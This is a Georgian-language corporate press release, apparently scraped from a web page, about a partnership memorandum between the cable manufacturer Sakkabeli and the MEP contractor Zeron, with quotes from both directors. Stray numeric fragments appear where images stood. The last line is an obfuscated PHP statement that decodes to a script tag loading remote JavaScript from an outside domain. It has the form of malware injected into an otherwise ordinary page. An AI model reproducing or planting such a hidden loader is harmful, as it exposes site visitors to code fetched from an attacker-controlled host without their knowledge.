celsiusi
ავერსი საქკაბელი

საკაბელო ინდუსტრიის ლიდერ კომპანია „საქკაბელსა“ და „ელემენტ ჰოლდინგის“ შვილობილ, მოწინავე ელექტროსამონტაჟო კომპანია „ზერონს“ შორის თანამშრომლობის მემორანდუმი გაფორმდა. შესაბამის დოკუმენტს ხელი „საქკაბელის“ მმართველმა დირექტორმა დავით კაპანაძემ და „ზერონის“ გენერალურმა დირექტორმა გიორგი დევდარიანმა მოაწერეს. თანამშრომლობის ფარგლებში, „ზერონი“ საკუთარ პროექტებში „საქკაბელის“ მიერ წარმოებულ, უმაღლესი ხარისხის საკაბელო პროდუქციას გამოიყენებს.   

მხარეებს შორის პარტნიორობით უკვე წარმატებით განხორციელდა არაერთი პროექტი, მათ შორის, ელექტროსამონტაჟო სამუშაოები შესრულდა ობიექტებზე: „კოკა-კოლას“ საწარმო, „წყალი მთის“ სასაწყობე ობიექტი, „დეილის“ ლოგისტიკური ცენტრი, „m2 მირცხულავაზე“ დეველოპერული პროექტი, „გოლდენ ფარმსის“ მოცვის გადამამუშავებელი საწარმო, ფარმაცევტული ლოგისტიკური ცენტრი „ფარმა სოლუშენი“ და სხვ.   

203623232656656565

განახლებული პარტნიორობა მიზნად ისახავს აამაღლოს ინდუსტრიის სტანდარტები და მომხმარებელს ინოვაციური საპროექტო გადაწყვეტები შესთავაზოს.   

„ზერონი“ დაარსების დღიდან წარმატებით პარტნიორობს „საქკაბელთან“. მოხარული ვართ, რომ თანამშრომლობა ღრმავდება და ახალ ეტაპზე გადადის, რაც ნიშნავს იმას, რომ „საქკაბელი“ გაზრდილი მოცულობის საკაბელო პროდუქციით დაუჭერს მხარს „ზერონის“ მიერ განხორციელებულ ინიციატივებს. აღნიშნული პარტნიორობა სრულ თანხვედრაშია „საქკაბელის“ ხედვასთან – ხელი შეუწყოს მაღალი ხარისხის, ინოვაციურ პროექტებს. აღნიშნულის უზრუნველსაყოფად კი, „საქკაბელი“ თანამედროვე დანადგარებსა და ქარხანაში მოქმედ ხარისხის კონტროლის ლაბორატორიას იყენებს, რაც საჭირო პროდუქტის დროულ მიწოდებას ხდის შესაძლებელს. პარტნიორობის ფარგლებში, „საქკაბელი“ „ზერონს“ საკაბელო პროდუქციით უზრუნველყოფს, რომელიც სრულად აკმაყოფილებს შესაბამის საერთაშორისო სტანდარტებს. დარწმუნებული ვართ, ერთობლივი ძალებით კიდევ არაერთ მნიშვნელოვან პროექტს განვახორციელებთ”, – „საქკაბელის“ მმართველი დირექტორი, დავით კაპანაძე.

3 1536x1025256333333333333333

 ,,ნულოვანი წინააღმდეგობა’’ – „ზერონის“ მთელი გუნდი ამ სლოგანისა და იდეის გარშემო ერთიანდება. ჩვენი გუნდის მიზანია, მომხმარებლებმა მაქსიმალური შედეგი მინიმალურ დროში მიიღონ. „საქკაბელთან“ თანამშრომლობა კი „ზერონისთვის“ დამატებითი გარანტია იმისა, რომ ჩვენი მომხმარებლები პრემიუმ ხარისხის, საერთაშორისო სტანდარტებით დამზადებული საკაბელო გადაწყვეტებით ისარგებლებენ. პარტნიორობის ფარგლებში, „საქკაბელის“ მიერ წარმოებული 100-მდე დასახელების პროდუქცია უკვე წარმატებით გამოვიყენეთ, მათ შორის სამონტაჟო, ძალოვანი თუ ცეცხლმედეგი კაბელები, რომელიც სრულ თანხვედრაშია MEP  სისტემის საინჟინრო და NFPA ხანძრის უსაფრთხოების სტანდარტებთან. თანამშრომლობის გაღრმავების ერთ-ერთი მთავარი მიზეზი სწორედ სანდოობის ფაქტორია. განსაკუთრებით სასიხარულო კი ისაა, რომ პარტნიორობის ფარგლებში გვეძლევა შესაძლებლობა, მხარი დავუჭიროთ ქართულ წარმოებას და ხელი შევუწყოთ ადგილობრივი ელექტრო ინდუსტრიის წინსვლას“, – „ზერონის“ გენერალური დირექტორი, გიორგი დევდარიანი.

4 1526132036569565263

საქკაბელი შესახებ: „საქკაბელი“ ადგილობრივ ბაზარზე სფეროს ლიდერის პოზიციას 67- წელია იკავებს და მომხმარებელსროგორც საკაბელოისე ელექტრიფიკაციასთან დაკავშირებულ 2000-მდე დასახელების პროდუქტს სთავაზობსკომპანიის ერთერთი პრიორიტეტული მიმართულება საექსპორტო ბაზრების დივერსიფიცირება და ქართულ ეკონომიკაში იმპორტის ჩანაცვლებაააღსანიშნავიარომ “საქკაბელის” პროდუქციაროგორც ადგილობრივისე საერთაშორისო ბაზარზემომხმარებელთან გაგზავნამდე დეტალურ შემოწმებას ქარხანაში მოქმედხარისხის კონტროლის აკრედიტებულ ლაბორატორიაში გადის.

„ზერონის“ შესახებ: „ზერონი“ „ელემენტ ჰოლდინგის“ შვილობილი კომპანიაა, რომელმაც  ბაზარზე 2022 წელს, როგორც ელექტროსამონტაჟო სამუშაოების შემსრულებელმა კომპანიამ შეაბიჯა. თუმცა, მისი საქმიანობის სპექტრი მალევე გაფართოვდა. ამჟამად კომპანია მომხმარებელს სრულ MEP მომსახურებას სთავაზობს, რაც ნიშნავს იმას, რომ ზერონისგან დამკვეთებს არა მხოლოდ ელექტრო, არამედ წყლის, ხანძარქრობის, HVAC-ისა (გათბობა, გაგრილება, ვენტილაცია) და ავტომატიზირებული სისტემების საპროექტო და სამონტაჟო მომსახურების მიღება შეუძლიათ.

 

87
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");